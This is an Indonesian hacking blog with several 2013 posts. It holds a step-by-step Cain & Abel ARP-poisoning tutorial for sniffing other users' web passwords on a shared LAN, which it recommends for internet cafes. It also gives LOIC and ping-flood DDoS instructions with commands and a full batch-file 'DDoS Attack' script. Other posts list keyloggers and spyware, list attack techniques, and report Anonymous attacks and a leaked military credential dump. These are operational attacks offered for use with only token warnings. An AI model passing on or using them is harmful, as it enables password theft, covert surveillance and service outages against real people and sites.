Jumat, 15 Februari 2013

Hack Attack: Membobol Password Situs Web


Hack Attack: Membobol Password Situs Web


Dari konsep hacking yang telah Saya sebutkan sebelumnya, mungkin ada yang kurang yaitu tidak disebutkannya contoh. Sekarang Saya mencoba untuk menuliskan salah satu contoh yang dari konsep tersebut. Contoh kali ini mengenai bagaimana membobol password seseorang jika seseorang itu menuliskan password yang mana komputer yang dia pakai masih dalam satu LAN yang sama dengan sang penyerang. 

Sebelumnya, Saya akan menjelaskan terlebih dahulu bahwa dalam contoh kasus kali ini Saya menggunakkan konfigurasi jaringan seperti ini:



Pada contoh kasus kali ini kita akan memanfaatkan kelemahan dari sistem jaringan yang disebut ARP Spoofing. Singkatnya, peracunan ARP ini akan membuat data mengalihkan data kiriman ke komputer penyerang. Misalnya, pada ilustrasi di atas terlihat jaringan LAN yang terdiri dari 2 komputer. Harusnya, jika data mau dikirimkan ke internet, maka data itu ya langsung dikirimkan ke internet tanpaembel-embel apa pun (kecuali switch). Namun, jika komputer penyerang mengirimkan racun ARP ke korban, maka korban akandibegoin. Setiap data yang dikirimkan dari korban, maka akan mampir dulu di komputer penyerang.

Untuk mengirimkan racun-racun ini, kita bisa menggunakan perangkat lunak bernama Cain 'n Abel. Untuk mengunduhnya, Anda dapat langsung mengunjungi situsnya. Setelah diunduh Anda dapat langsung memasangnya seperti halnya memasang perangkat lunak lainnya.

Setelah selesai dipasang (diinstall), mulailah melakukan hacking. Sekarang buka program Cain tersebut dan melakukan langkah-langkah berikut ini.

  1. Aktifkan Sniffing (pengintipan data) dan ARP Poisinoing. Caranya dapat Anda lihat pada screenshot di bawah. Jika diminta memilih kartu jaringan, maka pilihlah adapter jaringan yang Anda pakai. Terkadang akan terdeteksi 2 adapter jaringan atau bahkan lebih. Untuk memilih yang mana yang benar, Anda bisa coba-coba memilih salah satu di antaranya dan langsung ke langkah selanjutnya. Jika langkah berikutnya tidak bekerja, cukup ganti lewat menu Configure. Sebagai informasi, adapter YANG PASTI SALAH jika ada kata DIALUP (karena ini modem dan bukan kartu jaringan).
    Mengaktifkan Sniffing dan ARP.
  2. Buka tabulasi sniffer, klik pada kotak kosong, klik tambah, lalu klik OK. Biarkan dia loading dan Anda akan melihat daftar komputer yang ada pada subnet yang sama. Anda tak perlu mengerti subnet itu apa, cukup ke langkah selanjutnya.
    Menampilkan daftar komputer.
  3. Mengaktifkan Sniffing dan ARP.
  4. Klik pada tabulasi Sniffer, lalu ke APR, lalu klik kotak kosong bagian atas, lalu klik tombol tambah.
    Memulai meracuni dengan ARP
  5. Kemudian akan muncul kotak dialog pemilihan "pembodohan rute data". Di sini Anda harus memilih antara alamat IP komputer korban dan alamat IP node pusat. Untuk mengetahui alamat IP komputer korban, Anda harus nebak atau langsung ngecek di komputer korbannya. Untuk mengetahui alamat IP, pergi ke Start > Run > cmd > ENTER > ipconfig /all > ENTER. Setelah itu Anda akan melihat tampilan kira-kira seperti ini:



    C:\Users\Mufid>ipconfig /all

    Windows IP Configuration

    Host Name . . . . . . . . . . . . : fidz-vista
    Primary Dns Suffix . . . . . . . :
    Node Type . . . . . . . . . . . . : Unknown
    IP Routing Enabled. . . . . . . . : No
    WINS Proxy Enabled. . . . . . . . : No

    Ethernet adapter Local Area Connection:

    Connection-specific DNS Suffix . :
    Description . . . . . . . . . . . : SiS 900-Based PCI Fast Ethernet Adapter
    Physical Address. . . . . . . . . : 00-E0-18-AC-C4-8B
    Dhcp Enabled. . . . . . . . . . . : Yes
    Autoconfiguration Enabled . . . . : 00-E0-18-AC-C4-8B
    IP Address. . . . . . . . . . . . : 192.168.1.6 (INI ALAMAT KORBAN)
    Subnet Mask . . . . . . . . . . . : 255.255.255.0
    Default Gateway . . . . . . . . . : 192.168.1.1 (INI NODE PUSATNYA)
    DHCP Server . . . . . . . . . . . : 192.168.1.1


    Karena itu, langsung saja lakukan penyadapan data antara alamat IP komputer korban dan alamat IP node pusat. Sebagai tambahan, node pusat komputer korban dan komputer penyerang adalah sama. Setelah selesai Anda dapat lihat penyadapan telah dimulai!
  6. Sekarang semua password yang diketikan di halaman web manapun di komputer korban akan terbaca di komputer penyerang!
  7. Mari kita tes. Saya buka situs web Friendster di komputer korban.
    Membuka situs web Friendster untuk menguji keampuhan racun-racun ini!
  8. Lalu kembali ke komputer penyerang. Pergi ke tabulasi Passwords, lalu pilih HTTP dan geser daftar ke bawah. Wuuhuu Anda melihat passwordnya sekarang! Perlu diketahui, daftar ini diupdate secara real-time. Jadi setiap password yang dikirimkan lewat halaman web, akan muncul di komputer penyerang tanpa harus mengklik tombol REFRESH (karena memang tidak ada :p)
    Lihatlah password-password itu terbongkar!


Dan itulah bagaimana cara melakukan hackingnya. Trik ini sangat efektif jika dilakukan di warnet, karena di situ banyak password berterbaran.

Apakah ada cara perlindungannya? Tentu saja ada. Tapi caranya cenderung agak ribet dan gak' simpel. Saran Saya, lebih baik Anda menggunakan komputer yang terjamin keamanannya. Di rumah, misalnya. Meski begitu, sudah ada beberapa situs web yang mengenkripsi password sebelum dikirim. Sehingga, walau password dapat disadap, password itu tidak berarti apa-apa.

Senin, 11 Februari 2013

Hacker Top Indonesia


3 HACKER TOP INDONESIA


Dani Firmansyah A.K.A Xnuxer nuxer, nama panggilan Dani Firmansyah di dunia bawah tanah, di tangkap Satuan Cyber Crime Direktorat Reserse Khusus Kepolisian Daerah Metro Jaya pada tanggal 24 April 2004 sekitar pukul 17:20 di Jakarta. umat 16 April, Xnuxer mencoba melakukan tes sistem sekuriti kpu.go.id melalui XSS (cross site scripting) dari IP 202.158.10.117, namun dilayar keluar message risk dengan level low (website KPU belum tembus atau rusak). Sabtu 17 April 2004 pukul 03.12,42, Xnuxer mencoba lagi melakukan penetrasi ke server tnp.kpu.go.id dengan cara SQL Injection dan berhasil menembus IP tnp.kpu.go.id 203.130.201.134, serta berhasil meng-up date daftar nama partai pada pukul 11.23,16 sampai pukul 11.34,27. Teknik yang dipakai Xnuxer dalam meng-hack yakni melalui teknik spoofing (penyesatan). Xnuxer melakukan serangan dari IP 202.158.10.117, kemudian membuka IP Proxy Anonymous Thailand 208.147.1.1 sebelum msuk ke IP tnp.kpu.go.id 203.130.201.134, dan berhasil membuka tampilan nama 24 partai politik peserta pemilu.Beruntung Xnuxer meng-hack situs KPU hanya karena ingin mengetes keamanan sistem keamanan server tnp.kpu.go.id, tanpa ada muatan politik. Di tambah, sifat Xnuxer yang sangat cooperatif, akhirnya Xnuxer hanya di bui beberapa bulan saja.  

I Made Wiryana A.K.A Pak Made Cyber Paspampres nih, konon website dan server President SBY beliau yang pegang untuk maintenance dan keamanannya… (pernah digempur ampe DDos, namun dalam waktu itungan detik back-up server –ga tau dah back-up yang nomor berapa– langsung up). Beliau juga pelopor perkembangan linux di indonesia bersama pak Rusmanto (redaktur Info Linux) and yang pasti dia Dosen di Universitas Gunadarma, menyelesaikan pendidikan di dua institusi pendidikan yaitu S1-Fisika Universitas Indonesia pada tahun 1991 dan S1-manajemen Informatika STIMIK Gunadarma tahun 1992 dan melanjutkan Magister di eidith cowan university Australia dan sejak tahun 2004 sampai sekarang sedang menyelesaikan program Doktoral di RVS Bielfield Jerman. Dan sekarang berdomisili di Jerman. Status pekerjaannya adalah Dosen Tetap universitas Gunadarma.  

Onno W. Purbo A.K.A Kang Onno Onno Widodo Purbo (lahir di Bandung 17 Agustus 1962; umur 45 tahun) adalah seorang tokoh (yang kemudian lebih dikenal sebagai pakar di bidang) teknologi informasi asal Indonesia. Ia memulai pendidikan akademis di ITB pada jurusan Teknik Elektro pada tahun 1981. Enam tahun kemudian ia lulus dengan predikat wisudawan terbaik, kemudian melanjutkan studi ke Kanada dengan beasiswa dari PAU-ME. RT/RW-Net adalah salah satu dari sekian banyak gagasan yang dilontarkan. Ia juga aktif menulis dalam bidang teknologi informasi media, seminar, konferensi nasional maupun internasional. Percaya filosofy copyleft, banyak tulisannya dipublikasi secara gratis di internet. Pejuang kemerdekaan frekuensi 2.4 GHz, VOIP-Rakyat, dan Antena Wifi dari kaleng.

Minggu, 10 Februari 2013

Aplikasi Hacker


Bagi sebagian orang, hacking merupakan pekerjaan yang sia-sia karena tidak akan membawa manfaat positif bagi dirinya. Namun, bagi sebagian lain, terutama para pecinta “seni” hacker, aplikasi hacking merupakan sebuah karya dari orang-orang pintar yang akan sangat menarik untuk dipelajari.

Untuk ruang lingkup yang masih sempit dengan orientasi sederhana, bolehlah kita sekali-kali menggunakan aplikasi hacking. Kita bisa menggunakannya untuk mengerjai teman-teman dekat atau kerabat. Namun, jika ruang lingkupnya sudah meluas dan orientasi kita sudah negatif, jangan sekalipun mengunakan aplikasi hacking ini.

Penggunaan aplikasi hacking untuk perbuatan kriminal, seperti pencurian dan kejahatan lainnya sangat tidak dianjurkan. Selain akan merugikan orang lain, perbuatan semacam ini sangat bertentangan dengan hukum sehingga bukan mustahil akan membawa penggunanya ke balik terali besi jika tertangkap.

Berikut ini merupakan koleksi aplikasi hacking yang bisa Anda pelajari dan tidak digunakan untuk melakukan sesuatu yang tergolong ke dalam tindakan kriminal.

1. Cain
Jika kita bisa bertanya kepada para hacker tentang tool yang paling popular di kalangan mereka, boleh jadi jawaban yang keluar dari mulut mereka adalah Cain. Ya, Cain merupakan aplikasi hacking yang serbabisa sehingga sangat digemari oleh para hacker. Cain bukan hanya bisa digunakan untuk melakukan hacking password, melainkan bisa juga untuk mengumpulkan nilai hash dari berbagai sumber.

2. Active Password Changer 
Tool ini merupakan aplikasi hacking yang bisa mengubah password yang terdapat dalam komputer manapun yang bisa kita akses secara fisik. Aplikasi ini memiliki beberapa fitur dengan kemampuan kerja yang cukup baik.
Beberapa pekerjaan yang bisa dilakukan tool ini, di antaranya adalah melakukan booting dari cd, floopy disk, atau USB. Tak hanya itu, tool ini pun menyediakan CD burner sederhana untuk memburning file pada CD.

3. Dumpacl-dumpsec
Tool yang ini biasa digunakan para hacker untuk melakukan semua pekerjaan yang berkaitan dengan enumerasi. Dengan memanfaatkan Nulls Connections, tool ini mampu menampilkan user account aktif secara detail. Semua aktivitas yang dilakukan oleh sebuah account aktif terekam oleh tool ini. Dulu, sebelum bernama Dumpacl-dumpsec, tool ini memiliki nama Dump ACL.

4. Handy Keylogger
Tool ini sama dengan aplikasi hacking lainnya, yakni tak akan bisa dideteksi oleh Task Manager. Setiap aktivitas yang dikerjakan dalam komputer yang telah dipasangi aplikasi ini akan tercatat seluruhnya, sehingga Anda bisa mengetahui apa saja yang dilakukan oleh pengguna komputer ini, misalnya apa saja yang diketikan oleh pengguna, alamat website mana saja yang dikunjungi, dan sebagainya.

5. Spytech Spy Agen
Tool ini merupakan sebuah aplikasi mata-mata yang akan mencatat segala aktivitas user secara sembunyi-sembunyi. Semua file log atau aktivitas user yang tersimpan dapat kita enkripsi sehingga mudah terlihat. Tool yang satu ini memiliki cara penggunaan yang mudah, cukup dengan menekan Ctrl+Shift+Alt+M, maka tool default ini akan langsung bekerja.

Di samping kelima aplikasi hacking yang paling diminati tersebut, masih banyak lagi aplikasi lainnya. Berikut adalah beberapa aplikasi tersebut.
  • Wingerprint versi 0.6.2
  • Track Eraser Pro
  • Sams Big Play Maker
  • Actual Spy
  • Privacy Keyboard
  • Lophtkrack Administrator
  • Yahoo Password+key
  • Wifi Password Finder
  • Facebook Password Hacker
  • Internet Password Lock

Cara Mudah Buat Game 3D



Sekarang membuat 
Game 3 Dimensi bukanlah hal yang tabu untuk kita lakukan. Dengan Kodu Game Lab kita bisa membuat Game berbasis 3 Dimensi secara mudah, tanpa perlu melakukan Coding, tanpa menguasai  bahasa pemrograman, karena di Kodu Game Lab yang kita perlukan hanyalah Logika dalam pembuatan game itu sendiri, apalagi game yang dibuat di Kodu Game Lab adalah berbasis 3 Dimensi. Kodu Game Lab merupakan software besutan Microsoft, dengan Kodu Game Lab kamu dapat memperbesar dan keluar dari lingkungan 3D melalui mouse dan scroll wheel, dan drag dan menempatkan objek 3D untuk membangun lingkungan permainan seperti membangun alam Lego universe. 
Cara Membuat Game 3D
Cara Membuat Game 3D

Jumat, 08 Februari 2013

Cara Hacker Membobol Situs

Inilah Cara yang Dipakai Seorang Hacker Untuk Menembus Situs Atau Web-Cara cara seoarang hacker menembus ataupun menyusup dan juga merusak suatu website adalah sebagai berikut.Teknik teknik itu antara lain:
wordpress website hacked by hackers 01 Inilah Cara Yang Dipakai Hacker Untuk Membobol Website

1. IP Spoofing
2. FTP Attack
3. Unix Finger Exploits
4. Flooding & Broadcasting
5. Fragmented Packet Attacks
6. E-mail Exploits
7. DNS and BIND Vulnerabilities
8. Password Attacks
9.Proxy Server Attacks
10. Remote Command Processing Attacks
11. Remote File System Attack
12. Selective Program Insertions
13. Port Scanning
14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
15. HTTPD Attacks

1. IP Spoofing
IP Spoofing juga dikenal sebagai Source Address Spoofing, yaitu pemalsuan alamat IP attacker sehingga sasaran menganggap alamat IP attacker adalah alamat IP dari host di dalam network bukan dari luar network. Misalkan attacker mempunyai IP address type A 66.25.xx.xx ketika attacker melakukan serangan jenis ini maka Network yang diserang akan menganggap IP attacker adalah bagian dari Networknya misal 192.xx.xx.xx yaitu IP type C.

IP Spoofing terjadi ketika seorang attacker "mengakali" packet routing untuk mengubah arah dari data atau transmisi ke tujuan yang berbeda. Packet untuk routing biasanya di transmisikan secara transparan dan jelas sehingga membuat attacker dengan mudah untuk memodifikasi asal data ataupun tujuan dari data. Teknik ini bukan hanya dipakai oleh attacker tetapi juga dipakai oleh para security profesional untuk men tracing identitas dari para attacker

2. FTP Attack
Salah satu serangan yang dilakukan terhadap File Transfer Protocol adalah serangan buffer overflow yang diakibatkan oleh malformed command. tujuan menyerang FTP server ini rata-rata adalah untuk mendapatkan command shell ataupun untuk melakukan Denial Of Service. Serangan Denial Of Service akhirnya dapat menyebabkan seorang user atau attacker untuk mengambil resource didalam network tanpa adanya autorisasi, sedangkan command shell dapat membuat seorang attacker mendapatkan akses ke sistem server dan file-file data yang akhirnya seorang attacker bisa membuat anonymous root-acces yang mempunyai hak penuh terhadap system bahkan network yang diserang

3. Unix Finger Exploits
Pada masa awal internet, Unix OS finger utility digunakan secara efisien untuk men sharing informasi diantara pengguna. Karena permintaan informasi terhadap informasi finger ini tidak menyalahkan peraturan, kebanyakan system Administrator meninggalkan utility ini (finger) dengan keamanan yang sangat minim, bahkan tanpa kemanan sama sekali. Bagi seorang attacker utility ini sangat berharga untuk melakukan informasi tentang footprinting, termasuk nama login dan informasi contact.

Utility ini juga menyediakan keterangan yang sangat baik tentang aktivitas user didalam sistem, berapa lama user berada dalam sistem dan seberapa jauh user merawat sistem. Informasi yang dihasilkan dari finger ini dapat meminimalisasi usaha kracker dalam menembus sebuah sistem. Keterangan pribadi tentang user yang dimunculkan oleh finger daemon ini sudah cukup bagi seorang atacker untuk melakukan social engineering dengan menggunakan social skillnya untuk memanfaatkan user agar "memberitahu" password dan kode akses terhadap system.

4. Flooding & Broadcasting
Seorang attacker bisa mengurangi kecepatan network dan host-host yang berada di dalamnya secara significant dengan cara terus melakukan request/ permintaan terhadap suatu informasi dari sever yang bisa menangani serangan classic Denial Of Service (DoS), mengirim request ke satu port secara berlebihan dinamakan flooding, kadang hal ini juga disebut spraying. Tujuan dari kedua serangan ini adalah sama yaitu membuat network resource yang Menyediakan informasi menjadi lemah dan akhirnya menyerah.

Serangan dengan cara Flooding bergantung kepada dua faktor yaitu: ukuran dan/atau volume (size and/or volume). Seorang attacker dapat menyebabkan Denial Of Service dengan cara melempar file berkapasitas besar atau volume yang besar dari paket yang kecil kepada sebuah system. Dalam keadaan seperti itu network server akan menghadapi kemacetan: terlalu banyak informasi yang diminta dan tidak cukup power untuk mendorong data agar berjalan. Pada dasarnya paket yang besar membutuhkan kapasitas proses yang besar pula, tetapi secara tidak normal paket yang kecil dan sama dalam volume yang besar akan menghabiskan resource secara percuma, dan mengakibatkan kemacetan

5. Fragmented Packet Attacks
Data-data internet yang di transmisikan melalui TCP/IP bisa dibagi lagi ke dalam paket-paket yang hanya mengandung paket pertama yang isinya berupa informasi bagian utama (header/ kepala) dari TCP. Beberapa firewall akan mengizinkan untuk memproses bagian dari paket-paket yang tidak mengandung informasi alamat asal pada paket pertamanya, hal ini akan mengakibatkan beberapa type system menjadi crash. Contohnya, server NT akan menjadi crash jika paket-paket yang dipecah (fragmented packet) cukup untuk menulis ulang informasi paket pertama dari suatu protokol

6. E-mail Exploits
Peng-exploitasian e-mail terjadi dalam lima bentuk yaitu: mail floods, manipulasi perintah (command manipulation), serangan tingkat transportasi(transport level attack), memasukkan berbagai macam kode (malicious code inserting) dan social engineering(memanfaatkan sosialisasi secara fisik). Penyerangan email bisa membuat system menjadi crash, membuka dan menulis ulang bahkan mengeksekusi file-file aplikasi atau juga membuat akses ke fungsi fungsi perintah (command function)

7. DNS and BIND Vulnerabilities
Berita baru-baru ini tentang kerawanan (vulnerabilities) tentang aplikasi Barkeley Internet Name Domain (BIND) dalam berbagai versi mengilustrasikan kerapuhan dari Domain Name System (DNS), yaitu krisis yang diarahkan pada operasi dasar dari Internet (basic internet operation)

8. Password Attacks
Password merupakan sesuatu yang umum jika kita bicara tentang kemanan. Kadang seorang user tidak perduli dengan nomor pin yang mereka miliki, seperti bertransaksi online di warnet, bahkan bertransaksi online dirumah pun sangat berbahaya jika tidak dilengkapi dengan software security seperti SSL dan PGP. Password adalah salah satu prosedur kemanan yang sangat sulit untuk diserang, seorang attacker mungkin saja mempunyai banyak tools (secara teknik maupun dalam kehidupan sosial) hanya untuk membuka sesuatu yang dilindungi oleh password.

Ketika seorang attacker berhasil mendapatkan password yang dimiliki oleh seorang user, maka ia akan mempunyai kekuasaan yang sama dengan user tersebut. Melatih karyawan/ user agar tetap waspada dalam menjaga passwordnya dari social engineering setidaknya dapat meminimalisir risiko, selain berjaga-jaga dari praktek social enginering organisasi pun harus mewaspadai hal ini dengan cara teknikal. Kebanyakan serangan yang dilakukan terhadap password adalah menebak (guessing), brute force, cracking dan sniffing

9.Proxy Server Attacks
Salah satu fungsi Proxy server adalah untuk mempercepat waktu response dengan cara menyatukan proses dari beberapa host dalam suatu trusted network

10. Remote Command Processing Attacks
Trusted Relationship antara dua atau lebih host Menyediakan fasilitas pertukaran informasi dan resource sharing. Sama halnya dengan proxy server, trusted relationship memberikan kepada semua anggota network kekuasaan akses yang sama di satu dan lain system (dalam network).

Attacker akan menyerang server yang merupakan anggota dari trusted system. Sama seperti kerawanan pada proxy server, ketika akses diterima, seorang attacker akan mempunyai kemampuan mengeksekusi perintah dan mengkases data yang tersedia bagi user lainnya

11. Remote File System Attack
Protokol-protokol untuk tranportasi data (tulang punggung dari internet) adalah tingkat TCP (TCP Level) yang mempunyai kemampuan dengan mekanisme untuk baca/tulis (read/write) Antara network dan host. Attacker bisa dengan mudah mendapatkan jejak informasi dari mekanisme ini untuk mendapatkan akses ke direktori file

12. Selective Program Insertions
Selective Program Insertions adalah serangan yang dilakukan ketika attacker menaruh program-program penghancur, seperti virus, worm dan trojan (mungkin istilah ini sudah anda kenal dengan baik ?) pada system sasaran. Program-program penghancur ini sering juga disebut malware. Program-program ini mempunyai kemampuan untuk merusak system, pemusnahan file, pencurian password sampai dengan membuka backdoor

13. Port Scanning
Melalui port scanning seorang attacker bisa melihat fungsi dan cara bertahan sebuah system dari berbagai macam port. Seorang atacker bisa mendapatkan akses kedalam sistem melalui port yang tidak dilindungi. Sebaia contoh, scaning bisa digunakan untuk menentukan dimana default SNMP string di buka untuk publik, yang artinya informasi bisa di extract untuk digunakan dalam remote command attack

14.TCP/IP Sequence Stealing, Passive Port Listening and Packet
Interception TCP/IP Sequence Stealing, Passive Port Listening dan Packet Interception berjalan untuk mengumpulkan informasi yang sensitif untuk mengkases network. Tidak seperti serangan aktif maupun brute-force, serangan yang menggunakan metoda ini mempunyai lebih banyak kualitas stealth-like

15. HTTPD Attacks
Kerawanan yang terdapat dalam HTTPD ataupun webserver ada lima macam: buffer overflows, httpd bypasses, cross scripting, web code vulnerabilities, dan URL floods.

sumber

Messengger Melalui CMD

ada posting kali ini HCN akan sedikit berbagi dengan teman-teman semua mengenai cara melakukan chatting menggunakan Ms. DOS Command Prompt. Dengan metode ini, kita tidak memerlukan Messenger seperti YM dll. dalam berkomunikasi dengan teman kita. Lalu apa yang dibutuhkan? Kita hanya membutuhkan NotepadCommand Prompt, dan IP address dari Komputer teman kita. Pengen tahu caranya? Baca sampai tuntas di sini ya friend...

Berikut langkah-langkah yang harus dilakukan :

  1. Bukalah Notepad dan ketikkan kode berikut ini :
    @echo off
    :A
    Cls
    echo MESSENGER
    set /p n=User:
    set /p m=Message:
    net send %n% %m%
    Pause
    Goto A


  2. Save file yang anda buat tersebut dengan nama "Messenger.Bat"


  3. Buka Command Prompt dengan cara klik Start-->Run dan ketikkan cmd lalu tekan enter.
  4. Drag file yang telah anda buat tersebut "Messenger.Bat" pada Command Prompt anda dan tekan enter.


  5. Ketikkan IP address yang ingin anda hubungi dan tekanenter.


  6. Sekarang anda bisa mengetikkan pesan yang anda ingin kirimkan ke teman anda dan tekan enter untuk mulai mengirimkan pesan.

DDoS Attack Menggunakan LOIC


Cara Melakukan DDoS Attack menggunakan Low Orbit Ion Cannon



serangan DDoS Attack adalah serangan yang dilakukan pada server dengan cara membanjiri server dengan request ping atau request lainya dalam jumlah yang sangat banyak. serangan ini tidka dapat dicegah karena memang keroyokan alias ya berdo’a saja supaya situs kita tidak down akibat kena serangan DDoS Attack. ada pun cara untuk melakukan DDoS Attack sangat-sangat mudah, bahkan anak SMP pun bisa melakukanya. untuk mereka yang menggunakan OS Windows dapat menggunakan dua cara. cara pertama adalah dengan menggunakan software bernama Low Orbit Ion Cannonprogram ini tidak perlu diinstall cukup jalankan seperti program portable lainya.
1. Jalankan program
2. Setelah muncul Jendela di bagian URL masukan situs yang ingin diserang misalkan www.coba.com, lalu klik lock on
3. setelah itu klik tombol IMMA CHARGIN MAH LAZER
4. silakan lihat hasilnya dibawah, disana terdapat keterangan berapa jumlah packet yang connecting, requesting, downloading, downloaded, requested  dan failed.
5. jika berhasil berarti berarti pada bagian yang failed seharusnya banyak , yang menandakan bahwa server telah down.

cara kedua adalah dengan membanjiri Ping melalui command promt alias CMD. buka start->run dan ketikan cmd, atau tekan kombinasi tombol Windows + R dan ketik cmd, kemudian enter. setelah jendela Command Prompt muncul ketikan
#ping target.com
setelah itu akan muncul nomor ip dari situs tersebut, anggaplah nomor ip adalah 192.168.1.1, kemudian saatnya melakukan serangan ke sistem server hosting target.com.
#ping 192.168.1.1 -l 39999 -n 10000000 -w 0.00001
yang berarti :
n = besarnya Ping , nilai “10000000″ silakan diubah sesuai dengan yang diinginkan .
192.168.1.1= ganti alamat ip dari situs target.com
-W 0,00001 = Ini adalah periode waktu tunggu antar satu ping.
dua cara tadi jika anda di windows, bagaimana jika di linux, hal ini jauh lebih mudah untuk dilakukan tapi hal pertama yang harus dimiliki adalah hak sebagai root. silakan ketika command ini di terminal linux.
#sudo ping -f 192.168.1.1
system akan melakukan ping sebanyak yang bisa dibuat, biasanya 10.000/menit, jika respondnya adalah Host Unreachable dll, berarti system telah down. untuk alamat 192.168.1.1 silakan ganti dengan alamat ip situs target.com.
Selamat mencoba dan Try With Yout Own Risk. BTW jangan gunakan pada situs INI !!, karena situs ini dilindungi oleh UUD tentang per-situsan,  ( Peringatan ) dan  jika anda mencobanya maka PC anda sendiri yg terserang !! (Senjata makan tuan ),dilindungi dan diberkahi pula oleh Allah SWT, dan di dukung pula oleh 10 dukun baik dari Lamongan, Banyuwangi, Bali, Jadebotabek dan sekitarnya :D . siapa nge-hack, siap-siap kena Santet :p

Cara DDoS Attack Melalui Notepad

yah sekarang HANAFI! akan mempraktekan DDOS melalui notepad . langsung saja ya :

LANGKAH 1:
Copy code-code dibawah ini :

Code:


    @echo off
    mode 67,16
    title DDOS Attack
    color 0a
    cls
    echo.
    echo DDOS With Batchfile
    echo.
    set /p x=Server-Target:
    echo.
    ping %x%
    @ping.exe 127.0.0.1 -n 5 -w 1000 > nul
    goto Next
    :Next
    echo.
    echo.
    echo.
    set /p m=ip Host:
    echo.
    set /p n=Packet Size:
    echo.
    :DDOS
    color 0c
    echo Attacking Server %m%
    ping %m% -i %n% -t >nul
    goto DDOS


LANGKAH 2:
Buka application notepad dan paste code-code diatas tadi.

LANGKAH 3:
Save file anda seperti dibawah :

File Name : DDoS Attack.bat
Save As Type : All File <--- PENTING

    Quote: bisa disave dgn namafile bebas sesuka bro n sist..
    tapi ingat , File Extensi harus berformat .Bat

Cara-cara menggunakannya :
1. Double click file anda itu.
2. Akan tertera : Server-Target:
Masukkan alamat/url website anda.pastikan tidak ada http:// di depan dan / di belakang url.

    Quote:Contoh :
    Sebelum = http://www.google.com/
    Tukarkan kepada = www[.]google[.]com

    *hilangkan tanda '[]'.
    Setelah memasukkan url itu, tekan enter.


LANGKAH 4:
Selepas itu, website itu akan di-ping untuk mendapatkan ip address.Anda memerlukan IP Address itu.

Setelah selesai ping, akan keluar seperti ini :

Pinging http://www.google.com/

[209.85.175.106] with 32 bytes of data:
Reply from 209.85.175.106: bytes=32 time=30ms TTL=56
Reply from 209.85.175.106: bytes=32 time=40ms TTL=55
Reply from 209.85.175.106: bytes=32 time=24ms TTL=56
Reply from 209.85.175.106: bytes=32 time=36ms TTL=56

Ping statistics for 209.85.175.106:
Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
Minimum = 24ms, Maximum = 40ms, Average = 32ms

209.85.175.106 <----- IP address bagi http://www.google.com

    Quote: cara sama kok untuk web yg lain

4. Selepas itu, akan terpapar di tool itu : ip Host:
Masukkan saja ip address yg anda dapat tadi.

Contoh :
ip Host:209.85.175.106

dan tekan enter.

5. Pada akhirnya akan keluar pula : Packet Size :
Letakkan letakkan semau anda sebagai POWER !

Contoh :
Packet Size : 10000000

Dan tekan enter.

6. Akan terpapar : Attacking Server.....

Itu bermakna tool itu sedang menjalankan tugasnya(DDoS).

Jika ingin hasil yang maksimal , harus DDOS dengan beberapa komputer biar cepat down targetnya.

Sekian tutorial ini, agar bisa menjadi bahan pembelajaran bagi para Admin Server untuk selalu meningkatkan keamanan servernya. Salah satunya bisa menggunakan DDOS Protection, dll.

Kamis, 07 Februari 2013

Anonymous


ANONYMOUS HACKER
Adalah sekelompok aktivis yang tersebar hampir diseluruh dunia yang diperkirakan dibentuk pada tahun 2003 lalu.

Pada awalnya, konsep yang digunakan oleh kelompok yang terdiri dari sejumlah komunitas online yang terpencar ini adalah bertindak secara anonimus namun terkoordinasi, dan umumnya memiliki target yang disepakati, serta fokus pada kesenangan semata.


Mereka sering memakai topeng yang sama dengan fil V for Vendetta, yaitu topeng Guy Fawkes sebagai identitas mereka. Tapi banyak juga yang hanya memakai topeng biasa.




NAMUN
sejak tahun 2008, kelompok Anonymous semakin erat kaitannya dengan aktivitas hacking internasional yang saling bekerjasama, melakukan protes ataupun tindakan lain yang seringkali tujuannya berhubungan dengan mempromosikan kebebasan internet dan kebebasan berpendapat. Yaitu menentang adanya STOP SOPA PIPA (Stop All Piracy Act) Yang membuat agen FBI turun tangan untuk menyisir server² seperti Megaupload, Filesonic, Mediafire, dsb

dan seperti yang kita ketahui, sudah ada server yang ditutup..


Berkenaan dengan adanya kebijakan itu, (menurut sumber ane) Anonymous marah... Dan mengancam semua pihak yang mendukung ada nya stopipa ini.

Sudah banyak yang mendapat ancaman, dan salah satunya yang paling terkenal adalah FACEBOOK, karena dikabarkan FB menyalahgunakan data² privasi penggunanya, lalu menjualnya ke pihak ke 3 (sperti Intel, pemerintah, dsb). Dan akhirnya, kalian liat sendiri perubahan apa yang ada di FB saat ini.
Klik INI untuk ke TKP.

DAN TERNYATA!!!

Indonesia juga pernah diancam oleh anonymous. Mreka mengancam DEPKOMINFO jika mereka berusaha memfilter Internet. Klik INI untuk ke TKP

Menurut beberapa sumber pula, Anonymous sudah pernah membuktikan kekuatan mereka, yakni membobol web² ataupun situs² pemerintah Amerika. Dan ini menyebabkan kelumpuhan yang cukup lama. Oleh karena itu, hampir semua pihak yang mendapat ancaman dari anonymous kerap langsung tidak mendukung adanya stopapipa



Jadi, gimana menurut readers? Apakah mereka pantas disebut pahlawan kebebasan dunia maya? :)
TAMBAHAN BERITA

Pengguna MegaUpload Akan Menuntut FBI!

KOMPAS.com - Pengguna Megaupload menyatakan akan menuntut FBI karena telah menutup Megaupload secara tiba-tiba.

Hal ini menyebabkan pengguna yang memanfaatkan Megaupload untuk menyimpan data pribadi, harus kehilangan data-data mereka dan tak bisa mengaksesnya lagi.

"Penutupan tiba-tiba Megaupload ini tidak berdasar dan benar-benar tidak proporsional. Tidak sesuai dengan tujuan yang dimaksudkan," ujar Pirates of Catalonia.

Untuk itu, Pirate Parties International dari berbagai negara kini sedang menyusun daftar pengguna yang dirugikan. Potensi pelanggaran hukum AS sedang ditelusuri dari kasus ini. Dalam waktu dekat, gugatan akan diajukan kepada pemerintah AS.

untuk lebih detail silahkan baca disini


Situs TNI AD Terbobol Anonimus. Ratusan email beserta password tercuri.

Saat ini tengah marak di dunia maya “bocoran” informasi seputar database email milik anggota TNI AD beserta password akun tersebut. Database itu didapat oleh kelompok hacker Anonymous asal Indonesia yang mengambilnya dari situs resmi Angkatan Darat.


Adalah pengguna Twitter dengan nick anonymouSabu yang pertamakali menyebutkan bahwa rekan-rekannya di #opIndonesia telah menayangkan hasil penerobosan mereka ke laman http://www.tniad.mil.id.

“Our brothers at #opIndonesia dropping another dump for the indonesians: pastebin.com/ax26qcm2 tniad.mil.id #antisec #anonymous,” tweet anonymouSabu, pada akunnya, di Twitter.
